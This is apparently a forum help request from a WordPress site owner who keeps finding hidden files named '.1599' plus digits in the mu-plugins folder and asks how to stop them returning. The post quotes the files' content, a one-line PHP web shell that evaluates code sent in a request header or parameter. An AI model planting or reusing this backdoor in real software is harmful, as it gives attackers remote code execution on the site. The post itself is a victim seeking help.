I've been monitoring my wordpress installation and from time to time a file gets created in places like /wp-content/mu-plugins/wp-nc-easywp/plugin/Http/Checker/
The file name always starts with .1599.... followed by random numbers ex. .1599674957 or .1599875789
The code inside this file is <?php @eval($_HEADERS["E"]);@eval($_REQUEST["E"]);
What I do is delete all files with the .1599* recursively in the wordpress folder.
How do I resolve this?
Thank you for the help